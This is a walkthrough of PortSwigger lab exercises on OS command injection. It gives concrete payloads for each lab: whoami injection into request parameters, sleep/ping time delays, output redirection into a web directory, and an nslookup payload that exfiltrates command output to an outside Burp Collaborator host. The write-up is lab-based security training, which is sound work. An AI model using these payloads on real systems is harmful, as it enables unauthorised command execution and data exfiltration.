
OS command injection - PortSwigger

Table of Contents

OS command injection, simple case

Goal : execute the whoami command to determine the name of the current user.

  • intercept and modify a request that checks the stock level.

  • append |whoami or ;whoami to the storeId parameter

  • you can use this alsoproductId=1%26+whoami+%23&storeId=1 it’s encoded with URL encoding (productId=1& whoami #&storeId=1)

  • check the name in the response

os command injection

Blind OS command injection with time delays

Goal : exploit the blind OS command injection vulnerability to cause a 10 second delay.

  • go to submit feedback

  • I tried a lot of payloads in different parameters and finally these payloads solved the lab
    karim&`ping -c 10`#&
    karim&`sleep 10`#&
  • put any one in the name or email parameter and send the request

Blind OS command injection with output redirection

Goal : execute the whoami command and retrieve the output.

  • go to submit feedback

  • write the payload from previous lab %26+sleep+10+%23+ (& sleep 10 # ) in the email parameter

  • notice that it takes 10 seconds to respond , so this parameter is vulnerable

  • append the payload to email parameter with URL encoding
    & whoami > /var/www/images/whoami.txt #
  • open any image in new tab , replace its name with whoami.txt

Blind OS command injection with out-of-band interaction

Goal : exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

  • go to submit feedback

  • submit any values

  • from Burp collaborator client click copy to clipboard

  • send this request POST /feedback/submit to burp repeater

  • add the payload to the email parameter (we know that is the vulnerable parameter from the previous labs)
    &nslookup <your_own> #&
  • but encode it with URL encoding

  • the request body will look like this

    os command injection

  • send the request

  • if you go to Burp collaborator client and click pull now , you will see the DNS request to our domain

os command injection

Blind OS command injection with out-of-band data exfiltration

Goal : execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator.

  • go to submit feedback

  • submit any values

  • from Burp collaborator client click copy to clipboard

  • send this request POST /feedback/submit to burp repeater

  • add the payload to the email parameter (we know that is the vulnerable parameter from the previous labs)

    & nslookup `whoami` #&
  • but encode it with URL encoding

  • the request body will look like this
  • send the request

  • if you go to Burp collaborator client and click pull now , you will see the DNS request to our domain

os command injection

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